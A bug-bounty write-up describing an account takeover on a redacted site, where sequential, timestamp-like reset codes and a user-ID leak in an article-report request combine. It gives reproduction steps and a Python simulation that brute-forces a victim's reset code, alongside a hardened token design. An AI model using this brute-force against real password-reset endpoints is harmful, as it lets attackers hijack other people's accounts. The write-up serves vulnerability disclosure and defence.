My Fourth Account takeover through password reset


Omar Hamdy

Hello Everyone,

I’m Omar Hamdy (Seaman). Today I am going to explain one of the coolest bugs I found on a private program on Bugcrowd.

Let’s Start,

I was working on a private program, let’s call it redacted.com. After a while of reconnaissance on the program, I began to examine my favorite function, password reset, where I usually look for vulnerabilities like account takeover (ATO) and Host header injection.

Simply put, when a user wants to reset their password, they enter their email address and a password reset link is sent to that address.

I requested a password reset for my account and the password reset link was :

https://redacted.com/update-password/12d52catcbc344ec-9871-85ac6390d863/1621264272

The password reset link consists of two parts: the user ID (the UUID-like segment) and a 10-digit code.

What I found very interesting, and what enables a takeover of any user account, is that the 10-digit code is not random but sequential. If you request a reset for your own account and receive the code “1618963650”, then immediately request a reset for the victim’s account, the victim’s code will be something like “1618963720”: only the last three digits differ. That leaves at most 1,000 candidates (000 to 999) for the victim’s code, and in practice far fewer, because the victim’s code is only slightly larger than your own, so you can brute-force it. (The values are also consistent with Unix epoch timestamps in seconds: 1618963650 falls in April 2021, and the two codes are 70 apart, as if the two resets were issued 70 seconds apart. A time-based code is just as predictable as a counter.)

The remaining problem was that the user ID is not public. I spent more than two days searching for any endpoint that leaked it, tried Google dorks, and got nothing.

Part of the idea of the site is that users can publish articles, and there is a feature to report a specific article. I found that when you report an article, the request contains the ID of the user who published it, so the user ID of any author on the site leaks through that request.

Steps To Reproduce :

1- Request a password reset for your own account and note the 10-digit code from your reset link.

2- Request a password reset for the victim’s account.

3- Obtain the victim’s user ID from the report-article request.

4- Build the reset link with the victim’s user ID and your own 10-digit code, then brute-force the last three digits of the code with any request fuzzer. As soon as the right value is hit, the password update succeeds and the account is taken over. The link being attacked has this shape:

https://redacted.com/update-password/12d52catcbc344ec-9871-85ac6390d863/1621264272
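To make the brute-force concrete, the following Python model reproduces the flaw and shows the fix. It is an added example, not the site’s code or the author’s tooling: the token issuers, the epoch-seconds code generation, the class and method names, and the fake clock are all assumptions. The HTTP request to the update-password endpoint is replaced by a method call, so the whole thing runs offline; swap `server.update_password` for a real request and the attack loop is the same.

```python
"""Model of a sequential password-reset code next to a hardened issuer.
Constructed for illustration; nothing here is the redacted site's code."""
import hashlib
import hmac
import secrets
import time


class SequentialResetTokens:
    """Vulnerable issuer: the reset code is the issue time in epoch seconds
    (an assumption; the observed codes 1618963650 and 1618963720 are
    consistent with it). Codes issued seconds apart share their first
    seven digits, so an attacker who holds one code can guess the next."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}  # user_id -> current reset code

    def request_reset(self, user_id: str) -> str:
        code = str(int(self._clock()))
        self._codes[user_id] = code
        return code

    def update_password(self, user_id: str, code: str) -> bool:
        # Models GET /update-password/<user_id>/<code>: True means the reset
        # was accepted and the password could be changed.
        return self._codes.get(user_id) == code


def candidate_codes(attacker_code: str):
    """Yield every code sharing the first seven digits with our own code.
    The victim's code was issued after ours, so scan upward first and only
    then fall back to the rest of the 000-999 window."""
    base = int(attacker_code)
    prefix = base - base % 1000
    for c in range(base + 1, prefix + 1000):
        yield str(c)
    for c in range(prefix, base + 1):
        yield str(c)


def brute_force(server, victim_id: str, attacker_code: str):
    """Try candidates against the victim's user ID; return (code, attempts)."""
    attempts = 0
    for code in candidate_codes(attacker_code):
        attempts += 1
        if server.update_password(victim_id, code):
            return code, attempts
    return None, attempts


class RandomResetTokens:
    """Hardened issuer: 256-bit token from the OS CSPRNG, stored only as a
    SHA-256 digest, valid for TTL seconds, single use, constant-time compare."""

    TTL = 900

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}  # user_id -> (sha256(token), expiry)

    def request_reset(self, user_id: str) -> str:
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).digest()
        self._pending[user_id] = (digest, self._clock() + self.TTL)
        return token  # sent to the user's email only, never stored in clear

    def update_password(self, user_id: str, token: str) -> bool:
        entry = self._pending.get(user_id)
        if entry is None:
            return False
        digest, expiry = entry
        if self._clock() > expiry:
            del self._pending[user_id]
            return False
        if not hmac.compare_digest(digest, hashlib.sha256(token.encode()).digest()):
            return False
        del self._pending[user_id]  # single use: a token cannot be replayed
        return True


def demo():
    """Replay the write-up: our reset, the victim's reset 70 s later, then
    brute-force the victim's code using only our own code as the seed."""
    now = [1618963650]  # constructed clock value, matches the write-up
    vuln = SequentialResetTokens(lambda: now[0])
    mine = vuln.request_reset("attacker")
    now[0] += 70
    vuln.request_reset("victim")  # the attacker never sees this code
    return brute_force(vuln, "victim", mine)


if __name__ == "__main__":
    print(demo())  # the victim's code and the number of attempts it took
```

Against the vulnerable issuer the loop recovers the victim’s code in a few dozen requests; against `RandomResetTokens` the same 1,000-candidate window finds nothing, because the token space is 2^256 and the token is also time-limited and single use. Rate limiting on the update-password endpoint is a second, independent control worth adding, but it is no substitute for an unpredictable token.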

That’s All for today , Thanks for Reading :)

Follow me on twitter @seaman00o

Follow me on Facebook: https://www.facebook.com/profile.php?id=100028277354125
